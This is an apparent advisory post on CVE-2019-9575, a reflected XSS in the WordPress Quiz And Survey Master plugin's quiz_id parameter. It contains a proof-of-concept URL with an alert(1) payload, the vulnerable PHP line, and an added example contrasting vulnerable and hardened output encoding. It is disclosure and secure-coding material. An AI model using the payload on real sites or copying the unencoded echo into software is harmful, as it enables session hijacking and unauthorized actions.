
WordPress Quiz And Survey Master plugin CVE-2019-9575

2019-03-07 13:36:54
CVE 0day
www.cve0day.com

EPSS: 0.002 (Low), Percentile: 58.7%

Description

The Quiz And Survey Master WordPress plugin is vulnerable to reflected XSS as it echoes the quiz_id parameter without proper encoding.

Successful exploitation allows an attacker to execute JavaScript in the context of the application on behalf of the attacked user. This in turn enables an attacker to bypass CSRF protection and thus perform any action the legitimate user can perform, as well as read any data the user can access.

POC

http://192.168.0.103/wordpress/wp-admin/admin.php?page=mlw_quiz_results&quiz_id='"><img+src%3Dx+onerror%3Dalert(1)>
Code

quiz-master-next/php/admin/admin-results-page.php:
<input type="hidden" name="quiz_id" value="<?php echo $_GET["quiz_id"]; ?>" />
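
The same hidden field rebuilt with input validation and attribute-context output encoding, as an added example that is not the plugin's own code or its actual fix; the names encode_attr, render_vulnerable and render_hardened are chosen here, and the sample input is constructed.

```php
<?php
// Added example, not the plugin's code: the hidden field from
// admin-results-page.php, vulnerable form beside a hardened form.

// Constructed sample input with the same shape as an attacker-controlled quiz_id.
$sample_quiz_id = "'\"><img src=x onerror=alert(1)>";

// Hypothetical helper: encode for an HTML attribute context. Inside WordPress,
// esc_attr() is the idiomatic call; outside it, htmlspecialchars() with
// ENT_QUOTES covers both quote styles so the value cannot close the attribute.
function encode_attr(string $value): string {
    if (function_exists('esc_attr')) {
        return esc_attr($value);
    }
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Vulnerable form (what the page shows): the raw GET value is interpolated
// straight into the value attribute, so quotes and tags land in the markup.
function render_vulnerable(string $quiz_id): string {
    return '<input type="hidden" name="quiz_id" value="' . $quiz_id . '" />';
}

// Hardened form: quiz_id is an integer identifier, so reject anything that is
// not a non-negative integer, and still encode on output so a later change to
// a free-text field cannot silently reintroduce the injection.
function render_hardened(string $quiz_id): string {
    $id = filter_var($quiz_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        $id = 0; // invalid id: nothing attacker-controlled reaches the page
    }
    return '<input type="hidden" name="quiz_id" value="' . encode_attr((string) $id) . '" />';
}

echo "vulnerable: " . render_vulnerable($sample_quiz_id) . "\n";
echo "hardened:   " . render_hardened($sample_quiz_id) . "\n";
echo "hardened:   " . render_hardened("12") . "\n";
```

Validation alone would already stop this particular input, but encoding at the output sink is the control that does not depend on every caller remembering to validate.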

The post WordPress Quiz And Survey Master plugin CVE-2019-9575 first appeared on CVE 0day.
